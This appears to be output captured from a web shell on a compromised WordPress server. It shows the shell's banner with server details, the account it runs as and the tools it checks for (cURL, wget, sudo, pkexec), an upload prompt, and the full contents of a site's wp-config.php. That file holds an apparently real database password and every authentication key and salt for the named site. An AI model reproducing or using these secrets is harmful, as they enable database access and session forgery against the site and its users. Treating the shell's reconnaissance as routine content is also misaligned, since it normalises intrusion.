Server IP : 3.128.248.115 / Your IP : 3.14.249.124 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ip-172-31-33-233 5.15.0-1037-aws #41~20.04.1-Ubuntu SMP Mon May 22 18:18:00 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.28 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/seniorstraveler.com/ |
Upload File : |
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'seniorstraveler.com' ); /** Database username */ define( 'DB_USER', 'wordpress' ); /** Database password */ define( 'DB_PASSWORD', '&ARt#nDf*kch0Cr9zpbOK9z&FHg72yG7' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'ixHc; r:^IO]!M>_79$Ju3EoJVK*6a*Nm]uQud727-q@BYpRmGSpU^)`D>EzFx00'); define('SECURE_AUTH_KEY', '28dCx6o;l( Z5ZQ!&y9|c8++~7s*jI8fT`|w@6Kh)PuM*X%N;dbLHu*B9d0^(]D}'); define('LOGGED_IN_KEY', 'NL(;8[R$H-&mOcB8dMZ*4|k<J5-H(||`d`Xvh)I}-67cU7Y-RF|(tuR$e[lubzN|'); define('NONCE_KEY', '*wNzZg6RVdLt:46!,x6uVmY!zd!1-8_k!sGcVP1k0#un<:,EhN@YtZ.M>@a-D f|'); define('AUTH_SALT', 'p7Y|9~AuG;N~c]M|^=JVF-p>_||wS PW=TH<0hP1SGFHJ~|V;/2=7O|{Q/%W&%<.'); define('SECURE_AUTH_SALT', 'qNXm[%P%Fuj&@-A06fdAnUmy/pQ7:221CvZRP38,]aY0 R>-;LMQUup9a2~+@,18'); define('LOGGED_IN_SALT', 'kvSQK$y_7TS{;J+`~C9+r3?-v-~xO#?w^%NF}9q)Gz`sFjIw2<2CM[(1u#85|#^0'); define('NONCE_SALT', '>$%qT#-_0>+@yrFRl{d=_-Z,t,Um|BbJ%U}3%CguQN[JCzTX,wOOdH?448&(N!Rz'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';